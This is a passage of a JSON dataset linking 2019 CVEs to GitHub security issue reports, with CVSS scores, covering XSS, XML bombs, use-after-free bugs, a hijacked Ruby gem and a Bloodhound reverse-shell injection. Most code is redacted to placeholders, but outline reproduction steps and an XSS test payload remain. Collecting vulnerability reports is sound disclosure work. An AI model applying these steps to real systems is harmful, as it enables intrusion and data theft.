        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15160",
        "Issue_Url_old": "https://github.com/kbrw/sweet_xml/issues/71",
        "Issue_Url_new": "https://github.com/kbrw/sweet_xml/issues/71",
        "Repo_new": "kbrw/sweet_xml",
        "Issue_Created_At": "2019-03-30T16:30:34Z",
        "description": "Inline DTD allows XML bomb attack. This is Wiki page for the vulnerability, it is a very well known XML parser vulnerability: URLTAG To replicate this issue in APITAG you can do the following in an iex session and watch in the observer: FILETAG NUMBERTAG minutes or so later, and it's still running! I was looking into xmerl a bit to see if there's a way to disable inline DTD when using xpath before opening this issue, but I'm not familiar enough with it yet. Hoping someone else may be able to chime in. The closest thing I could find was in the FILETAG there's an option to turn off external DTD parsing. That sounds like that wouldn't solve this issue though, because internal DTD is the problem.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15224",
        "Issue_Url_old": "https://github.com/rest-client/rest-client/issues/713",
        "Issue_Url_new": "https://github.com/rest-client/rest-client/issues/713",
        "Repo_new": "rest-client/rest-client",
        "Issue_Created_At": "2019-08-19T10:45:06Z",
        "description": "Warning! is rest client NUMBERTAG hijacked?. Hi, It seems that rest client NUMBERTAG is uploaded to APITAG I did review between NUMBERTAG and NUMBERTAG and it seems that latest version evaluate remote code from pastebin.com and sends information to APITAG request.rb: ERRORTAG code from APITAG ERRORTAG BR, Jussi",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15226",
        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/8520",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/8520",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2019-10-07T19:46:57Z",
        "description": "TBA for Security Release. WARNING: If you want to report crashes, leaking of sensitive information, and/or other security issues, please consider reporting them using appropriate channels URLTAG . Issue Template Title : One line description Description : APITAG the issue. Please be detailed. If a feature request, please describe the desired behaviour, what scenario it enables and how it would be used. FILETAG gathers a tarball with debug logs, config and the following admin endpoints: /stats, /clusters and /server_info. Please note if there are privacy concerns, sanitize the data prior to sharing the tarball/pasting. Admin and Stats Output : APITAG the admin output for the following endpoints: /stats, /clusters, /routes, /server_info. For more information, refer to the admin endpoint documentation. URLTAG > Note : If there are privacy concerns, sanitize the data prior to sharing. Config : APITAG the config used to configure Envoy. Logs : APITAG the access logs and the Envoy logs. > Note : If there are privacy concerns, sanitize the data prior to sharing. Call Stack : > If the Envoy binary is crashing, a call stack is required . Please refer to the Bazel Stack trace documentation URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15228",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/536",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/536",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2019-08-17T17:52:01Z",
        "description": "XSS and CSRF in Blocks. FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-15237",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6891",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6891",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2019-08-18T21:31:57Z",
        "description": "IDN homograph attack when displaying e mail addresses.. Homograph attack is a security vulnerability that can deceive users into thinking they are visiting a certain website or the origin of an e mail when in fact it is a different, but homograph, domain name. This type of vulnerability can be used to weaponize social engineering, significantly increasing the chances for a successful attack. I have created a homograph of here.com using purely cyrillic characters PATHTAG (the punycode is xn APITAG I have other homographs, too, and registering them isn't a big deal. So I have sent an e mail from info APITAG c1adb NUMBERTAG c.com as SMTP, DNS, etc. only handle ASCII. However, for the sake of user friendliness, Roundcube will convert the domain name from ASCII to Unicode, without taking into consideration confusables. Therefore, the user will see the e mail as coming from EMAILTAG when in fact it came from another domain, xn APITAG In the case of APITAG the 'r' looks a bit off but this largerly depends on the display, system fonts, etc. Other confusables are completely visually indistinguishable. I have attached an example of an e mail coming from xn c1adb NUMBERTAG c.com when rendered in Roundcube. FILETAG Cheers, Julio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 4.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15325",
        "Issue_Url_old": "https://github.com/GalliumOS/galliumos-distro/issues/514",
        "Issue_Url_new": "https://github.com/galliumos/galliumos-distro/issues/514",
        "Repo_new": "galliumos/galliumos-distro",
        "Issue_Created_At": "2019-07-12T01:11:28Z",
        "description": "Yama security module not enabled in kernel. Hello All, In experimenting with some of the newer kernels I have found that APITAG is disabled in APITAG This leads to the failure of APITAG which tries to set APITAG to NUMBERTAG We should either enable CONFIG_SECURITY_YAMA or disable NUMBERTAG APITAG Yama is enabled in the default Ubuntu NUMBERTAG with the intent of preventing a malicious attacker from attaching to running processes to examine them with tools like gdb and strace . For more information on this and a better description of the security reasons for enabling this, please see your kernel APITAG . My machine specs are ... APITAG Banon My firmware is essentially APITAG . (He helped me build my own firmware from his git tree.') My installation method was ISO. And to reproduce the problem build kernel NUMBERTAG and look at the dmesg output. The kernel can't set PATHTAG Chris",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15480",
        "Issue_Url_old": "https://github.com/domoticz/domoticz/issues/3367",
        "Issue_Url_new": "https://github.com/domoticz/domoticz/issues/3367",
        "Repo_new": "domoticz/domoticz",
        "Issue_Created_At": "2019-07-01T08:17:03Z",
        "description": "XSS Vulnerability in FILETAG . Description The FILETAG is vulnerable against XSS. By adding a scene with some scripts in the scene name will lead to a XSS. Obviously this is thankful for an attacker if he is privilege to adding or edit scenes. The attacker can execute arbitrary code. Affected Version Current release NUMBERTAG Steps to Reproduce NUMBERTAG Clone and compile it. I follow the instructions from the wiki: URLTAG NUMBERTAG Run domoticz APITAG NUMBERTAG Open APITAG in your browser NUMBERTAG Click button: Add Scene NUMBERTAG Have fun to implement arbitrary scripts or even test it with APITAG FILETAG Fix Some APITAG is used in the FILETAG , but this XSS is still present. Escaping the APITAG fix the XSS. Furthermore use APITAG instead of APITAG . The APITAG function was deprecated in APITAG NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-15499",
        "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1263",
        "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1263",
        "Repo_new": "hackmdio/codimd",
        "Issue_Created_At": "2019-08-21T10:09:07Z",
        "description": "Open Redirect / XSS via iframe with sandbox.. Summary This is similar issue to NUMBERTAG but different cause. Due to sandbox attribute is allowed, attacker can redirect victim to something malicious if attacker embeds iframe with APITAG in sandbox attribute NUMBERTAG won't work in Chrome because of their security, but this will work due to sandbox is whitelist attribute. This will be XSS in Safari by using data scheme. Step to reproduce NUMBERTAG Type APITAG in Editor NUMBERTAG iew edited page. APITAG URLTAG APITAG APITAG will redirect you to FILETAG Suggested fix Don't allow sandbox attribute in PATHTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15507",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5761",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5761",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-08-06T00:33:17Z",
        "description": "Placeholder for NUMBERTAG master. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15508",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5750",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5750",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-08-01T23:06:46Z",
        "description": "Placeholder for NUMBERTAG master. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites ] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [ ] I have written a descriptive issue title [ ] I have linked the original source of this report [ ] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description APITAG Affected versions APITAG Octopus Server: Mitigation APITAG Workarounds APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15532",
        "Issue_Url_old": "https://github.com/gchq/CyberChef/issues/544",
        "Issue_Url_new": "https://github.com/gchq/cyberchef/issues/544",
        "Repo_new": "gchq/cyberchef",
        "Issue_Created_At": "2019-04-23T17:01:56Z",
        "description": "Bug report: Current release version does not include the recent XSS fix. Summary It looks like NUMBERTAG has been fixed in URLTAG but no release has been issued since the fix. Would it be possible to do a quick release APITAG to include the XSS fix? Thanks in advance for your consideration!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15532",
        "Issue_Url_old": "https://github.com/gchq/CyberChef/issues/539",
        "Issue_Url_new": "https://github.com/gchq/cyberchef/issues/539",
        "Repo_new": "gchq/cyberchef",
        "Issue_Created_At": "2019-04-12T15:01:39Z",
        "description": "Bug report: XSS with Encoding Brute Force. Summary While doing a CTF challenge, I was using cyber chef to encode a XSS javascript payload. When I put it through the text encoding brute force, alerts were displayed caused by the script. Example My input was APITAG alert('XSS') APITAG and when I added the brute force encoding multiple alerts popped up.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15535",
        "Issue_Url_old": "https://github.com/hotosm/tasking-manager/issues/1731",
        "Issue_Url_new": "https://github.com/hotosm/tasking-manager/issues/1731",
        "Repo_new": "hotosm/tasking-manager",
        "Issue_Created_At": "2019-06-28T14:40:19Z",
        "description": "Prevent SQL Injection when executing custom SQL. When using simple Python string formatting methods input values are not escaped which opens up the possibility of SQL injection attacks. For example: URLTAG APITAG provides a way to safely pass values to a custom SQL URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15541",
        "Issue_Url_old": "https://github.com/ctz/rustls/issues/285",
        "Issue_Url_new": "https://github.com/rustls/rustls/issues/285",
        "Repo_new": "rustls/rustls",
        "Issue_Created_At": "2019-08-08T09:07:49Z",
        "description": "bug in rustls mio. I have found the following situation: CODETAG The client is closed and the sever is trapped in loop of APITAG and ready function. URLTAG Maybe we should change the above code to CODETAG Thanks!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15551",
        "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/148",
        "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/148",
        "Repo_new": "servo/rust-smallvec",
        "Issue_Created_At": "2019-06-06T15:13:23Z",
        "description": "use after free when growing to the same size. Attempting to call grow on a spilled APITAG with a value equal to the current capacity causes it to free the existing data. CODETAG In the grow method URLTAG it falls through to deallocate. I believe something like the following is the fix: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15552",
        "Issue_Url_old": "https://github.com/sile/libflate/issues/35",
        "Issue_Url_new": "https://github.com/sile/libflate/issues/35",
        "Repo_new": "sile/libflate",
        "Issue_Created_At": "2019-06-26T01:28:22Z",
        "description": "Use after free on panic in client code. If the code that uses libflate panics, it may trigger a use after free in libflate code. Since use after free usually poses an arbitrary code execution vulnerability, I will relay further details privately to the maintainer. Code compiled with APITAG is not affected. This can be used as a mitigation in the interim.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15553",
        "Issue_Url_old": "https://github.com/Gilnaa/memoffset/issues/9",
        "Issue_Url_new": "https://github.com/gilnaa/memoffset/issues/9",
        "Repo_new": "gilnaa/memoffset",
        "Issue_Created_At": "2019-06-21T20:04:16Z",
        "description": "APITAG is unsound. With the implementation in: ERRORTAG you are constructing a APITAG at address APITAG . This is undefined behavior because Rust may assume that you have a valid APITAG but you do not. Moreover, in the old pre NUMBERTAG implementation you have: ERRORTAG Note that when you say APITAG you have already triggered undefined behavior because again, you assert with APITAG that you have a valid reference but you do not in fact. See URLTAG and URLTAG for a discussion. As for your comment about ERRORTAG , do note that ERRORTAG here does not make what you are doing any less undefined behavior. Instead, while you might not get an error from the compiler, you might get miscompilation should LLVM or rustc's behavior change. cc APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15554",
        "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/149",
        "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/149",
        "Repo_new": "servo/rust-smallvec",
        "Issue_Created_At": "2019-06-06T17:18:23Z",
        "description": "Using grow to shrink can cause corruption.. If grow is given a size that is within the inline size after a APITAG has been spilled, the resulting value is corrupted. ERRORTAG This is admittedly unusual, most code would use APITAG . I think the following should fix it. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15587",
        "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/171",
        "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/171",
        "Repo_new": "flavorjones/loofah",
        "Issue_Created_At": "2019-10-09T19:30:48Z",
        "description": "placeholder embargoes security vulnerability. This issue has been created for eventual public disclosure of a vulnerability in Loofah.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-15651",
        "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2421",
        "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2421",
        "Repo_new": "wolfssl/wolfssl",
        "Issue_Created_At": "2019-08-21T09:02:59Z",
        "description": "one byte heap overread ( PATHTAG ). tested on APITAG NUMBERTAG ubuntu NUMBERTAG clang / asan Hi, I've came upon an one byte heap overread bug due to corner case mishandling in APITAG PATHTAG ), you could trigger it by loading attached DER certificate using API APITAG (or FILETAG ( FILETAG Corner cases: CODETAG If idx + length == APITAG which passed the check, it will trigger a buffer over read in ( PATHTAG ) CODETAG ASAN report ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15698",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5810",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5810",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2019-08-27T06:16:15Z",
        "description": "Sensitive values may be exposed in some circumstances via variable preview. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . ] I have raised a CVE according to our [CVE process URLTAG [x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description In certain circumstances, an authenticated user with APITAG permissions could view sensitive values via the improved variable preview shipped in APITAG Introduced in URLTAG Affected versions Octopus Server APITAG APITAG Mitigation Nothing great. Workarounds Upgrade to Octopus APITAG Limit users with APITAG permission Ensure all variables that reference a secure variable are themselves marked as sensitive Use subscriptions to track modifications to variables to audit access. Links Source: internally reported.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15701",
        "Issue_Url_old": "https://github.com/BloodHoundAD/BloodHound/issues/267",
        "Issue_Url_new": "https://github.com/bloodhoundad/bloodhound/issues/267",
        "Repo_new": "bloodhoundad/bloodhound",
        "Issue_Created_At": "2019-08-25T02:48:07Z",
        "description": "Code execution in Bloodhound via malicious AD Object. Dear Bloodhound Team \u2013 I identified a way to achieve code execution in Bloodhound by creating a GPO with a name containing APITAG code that will trigger in Bloodhound's search autocomplete function. The injected APITAG is not only a valid xss but also allows the creation of a child process. The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat NUMBERTAG Create a GPO with the following name: APITAG NUMBERTAG Run Sharphound APITAG NUMBERTAG Import collected data NUMBERTAG Host the following js payload as FILETAG (all uppercase is important here since the sharphound output json always has the value for the name field in upper case) APITAG APITAG e.g. with APITAG NUMBERTAG Start listener APITAG NUMBERTAG Search for \"aa\" in Bloodhound and catch the shell I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than \"aaaaa\" and I also would not consider APITAG as one of my strengths but I hope I could prove my point here :) I also made a video APITAG Bloodhound APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15702",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/12086",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/12086",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2019-08-26T15:10:23Z",
        "description": "gnrc_tcp: option parsing doesn't terminate on all inputs, potential DOS. Description The APITAG parser for TCP options ( APITAG ) doesn't terminate on all inputs. When sending a packet with an unknown option and option length zero it doesn't advance the option pointer (i.e. advances it by zero) and therefore stays in the loop forever. Steps to reproduce the issue NUMBERTAG Configure the interface tap as follows APITAG NUMBERTAG Enable debug in APITAG NUMBERTAG Compile APITAG using: APITAG NUMBERTAG Start APITAG using: APITAG NUMBERTAG Invoke the following python script (requires scapy): CODETAG For example using APITAG Expected results The application should parse the unknown option once. Actual results The application parses the unknown option an infinite amount of times. Example output: ERRORTAG Impact Denial of service, possibly allowing battery drain, et cetera.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15714",
        "Issue_Url_old": "https://github.com/entropic-dev/entropic/issues/251",
        "Issue_Url_new": "https://github.com/entropic-dev/entropic/issues/251",
        "Repo_new": "entropic-dev/entropic",
        "Issue_Created_At": "2019-06-11T13:00:16Z",
        "description": "possible parent path traversal in command argument. Is this a feature request or a bug? bug Parent path traversal URLTAG is often considered a security problem. This is likely low impact if it is a security problem; the only vectors I can see is socially engineered copy/paste or postinstall hook abuse. If an attacker can get a JS file onto the machine, they might be able to use shell injection or malicious hooks to cause entropic to load that JS file, but an attacker can usually do anything via shell access that they could by running JS in the entropic process unless entropic evolved to accept multiple commands as a long lived, privileged process. Actual behavior: URLTAG APITAG fails with an error like ERRORTAG ... is not a function\" This works because APITAG backs out of APITAG to the root directory for entropic. Expected behavior: A command passed as the zero th argument at the command line should not cause line NUMBERTAG to load a package outside the commands subdirectory. Line NUMBERTAG should not load a dev dependency or a globally installed non dependency. Specifically, APITAG should dump help info instead of potentially calling prettier's export as an async function. Steps to replicate: APITAG Possible fix One way to address is to define a ERRORTAG that uses APITAG to convert APITAG to a file path, then use APITAG to find a path relative to __DIRNAME and see if the first component of that relative path is commands . Alternatively, if there is no desire to support commands like APITAG in the future then main could dump help text when APITAG . I can put together a PR if desired.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15716",
        "Issue_Url_old": "https://github.com/wtfutil/wtf/issues/517",
        "Issue_Url_new": "https://github.com/wtfutil/wtf/issues/517",
        "Repo_new": "wtfutil/wtf",
        "Issue_Created_At": "2019-07-24T16:02:21Z",
        "description": "Security: open call for thoughts on securing WTF's config file. WTF's APITAG file is a plain text file stored in the user's home directory. Given the nature of many of the modules in WTF, that file could hold account information, passwords, URIs, and API keys for the user's critical systems. This issue is a place to discuss the security of that file NUMBERTAG Does it need to be secured? Should we just trust the machine instead NUMBERTAG If it should, how so? What's least friction for the user?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-15758",
        "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/2288",
        "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/2288",
        "Repo_new": "webassembly/binaryen",
        "Issue_Created_At": "2019-08-07T21:48:28Z",
        "description": "Crash and Assertion failed in wasm2js. Hi, I observed two crash and assertion failed in wasm2js (based on commit APITAG The poc files are attached. How to reproduce: APITAG FILETAG Report of backtrace in gdb Assertaion failed ERRORTAG Crash ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15811",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/108",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/108",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2019-08-28T21:27:49Z",
        "description": "XSS: The parameter 'daterange' is not being sanitized correctly.. Hello, There is a Cross Site Scripting vulnerability in the file APITAG in the parameter daterange . APITAG of Concept:__ URLTAG Kind Regards, APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-15903",
        "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/317",
        "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/317",
        "Repo_new": "libexpat/libexpat",
        "Issue_Created_At": "2019-08-26T03:09:37Z",
        "description": "Heap overflow in APITAG Hello, Heap overflow found when I call below apis with a crafted input value. parser = APITAG APITAG APITAG if APITAG input, (int)strlen(input), XML_TRUE) != XML_STATUS_SUSPENDED) { fprintf(stderr, \"%d\", APITAG } Attached file has both a source code to replay this bug and the bug report of address sanitizer. This bug found R NUMBERTAG R NUMBERTAG I used following commands to build libexpat and build the source code for replaying the bug. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15903",
        "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/342",
        "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/342",
        "Repo_new": "libexpat/libexpat",
        "Issue_Created_At": "2019-09-08T18:11:07Z",
        "description": "Release Expat NUMBERTAG Regular releases: ] Bump APITAG version info, document in change log [ ] make distcheck source tarballs using APITAG [ ] Build and test Windows installer APITAG [ ] APITAG [ ] Upload Windows installer [ ] Upload source tarballs + APITAG GPG signature NUMBERTAG Make one new source tarball default download for all but Windows [ ] Make new installer binary default download for Windows [ ] APITAG [ ] APITAG signed Git tag URLTAG and push it [ ] Upload source tarball + APITAG GPG signature NUMBERTAG Upload Windows installer APITAG [ ] Let the community know: [ ] News item on FILETAG [ ] Mail Expat distro maintainers directly [ ] Write to the xml dev mailing list \u2014 TODO [ ] Blog about it at APITAG \u2014 TODO [ ] Submit to Hacker News \u2014 TODO [ ] Blog about it at APITAG \u2014 TODO [ ] APITAG ebuild in Gentoo) Specific to NUMBERTAG Request CVE for NUMBERTAG CVETAG [x] Add CVE to change log [ ] Open security bug in Gentoo \u2014 TODO",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15947",
        "Issue_Url_old": "https://github.com/bitcoin/bitcoin/issues/16824",
        "Issue_Url_new": "https://github.com/bitcoin/bitcoin/issues/16824",
        "Repo_new": "bitcoin/bitcoin",
        "Issue_Created_At": "2019-09-07T17:24:59Z",
        "description": "Crash dumps from bitcoin qt contain wallets. On a crash, bitcoin qt may dump a core file that contains what was in memory at the time of the crash, for debugging purposes. The problem here is that bitcoin qt stores the user's wallet.dat unencrypted in memory. With this information it becomes rather trivial to reconstruct parts of a user's wallet.dat from a .core dump alone. You can find the wallets within the core file simply by grepping for known parts of a wallet.dat ex: APITAG With this information you can find the offset of the wallet within the core file, and reconstruct it per a known APITAG length. Upon reloading the extracted wallet into bitcoin qt, you'll lose address book information but balance is retained. This has been assigned CVETAG . URLTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16060",
        "Issue_Url_old": "https://github.com/airbrake/airbrake-ruby/issues/468",
        "Issue_Url_new": "https://github.com/airbrake/airbrake-ruby/issues/468",
        "Repo_new": "airbrake/airbrake-ruby",
        "Issue_Created_At": "2019-04-09T18:07:23Z",
        "description": "blacklist_keys not being filtered out in version NUMBERTAG airbrake ruby version NUMBERTAG airbrake version NUMBERTAG also saw this issue with NUMBERTAG Ruby version NUMBERTAG Framework name & version: Rails NUMBERTAG Airbrake config CODETAG Description The APITAG are no longer being filtered out of the parameters. I can test this way from the console: ERRORTAG On airbrake ruby version NUMBERTAG the parameters show up as: APITAG On version NUMBERTAG of the gem, that filtering doesn't happen: APITAG I was able to get blacklist filtering to work again by adding this to the initializer, right after the APITAG block: APITAG",
